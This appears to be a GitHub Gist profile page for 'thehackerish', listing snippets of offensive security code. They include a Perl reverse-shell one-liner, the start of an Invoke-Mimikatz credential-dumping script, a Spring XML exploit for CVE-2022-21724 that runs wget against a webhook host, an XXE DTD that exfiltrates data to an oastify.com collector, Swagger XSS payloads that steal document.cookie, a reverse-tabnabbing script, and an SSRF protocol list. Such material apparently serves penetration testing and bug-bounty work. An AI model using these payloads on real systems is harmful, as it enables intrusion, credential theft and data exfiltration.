Skip to content

Instantly share code, notes, and snippets.

View thehackerish's full-sized avatar

thehackerish thehackerish

17 followers · 1 following
View GitHub Profile
@thehackerish
thehackerish / filespoof.js
Created January 31, 2025 14:03
function xhr(hostname, path, verb, csrf, body) {
return new Promise((resolve, reject) => {
var xhr = new XMLHttpRequest();
xhr.open(verb, hostname + path, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
if (xhr.status === 200) {
resolve(xhr.responseText);
@thehackerish
thehackerish / im.ps1
Created December 16, 2024 12:58
This file has been truncated, but you can view the full file.
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
@thehackerish
thehackerish / cve-2022-21724.xml
Last active April 7, 2022 10:18
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd">
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="test" class="java.lang.ProcessBuilder">
<constructor-arg type="java.lang.String" index="0"><value>wget</value></constructor-arg>
<constructor-arg type="java.lang.String" index="1"><value>https://webhook.site/08fc4b77-7e92-46c4-8f7a-fa3b76126698/123</value></constructor-arg>
<property name="whatever" value="#{test.start()}"/>
</bean>
@thehackerish
thehackerish / rce-poc.sh
Last active August 30, 2022 10:14
perl -e 'use Socket;$i="127.0.0.1";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@thehackerish
thehackerish / boo.ps1
Created February 16, 2021 13:44
#requires -version 2
function New-InMemoryModule {
<#
.SYNOPSIS
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
@thehackerish
thehackerish / swagger.json
Created April 13, 2020 12:50
swagger: "2.0",
info:
title: "Swagger Sample App",
description: "Please to click Terms of service"
termsOfService: "javascript:alert(document.cookie)"
contact:
name: "API Support",
url: "javascript:alert(document.cookie)",
email: "javascript:alert(document.cookie)"
version: "1.0.1"
@thehackerish
thehackerish / JavaDeserial.java
Last active April 8, 2024 22:32
Supporting material for the Insecure Deserialization blog post https://thehackerish.com/insecure-deserialization-explained-with-examples
import java.io.*;
public class JavaDeserial{
public static void main(String args[]) throws Exception{
FileInputStream fis = new FileInputStream("/tmp/normalObj.serial");
ObjectInputStream ois = new ObjectInputStream(fis);
NormalObj unserObj = (NormalObj)ois.readObject();
ois.close();
@thehackerish
thehackerish / handlers
Created July 17, 2019 08:00
acap
afp
dict
dns
file
ftp
git
gopher
http
https
@thehackerish
thehackerish / re.html
Created July 2, 2019 13:54
<script> opener.location="https://www.google.com"</script>
@thehackerish
thehackerish / poc.dtd
Last active September 29, 2022 17:02
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/%data3;'>">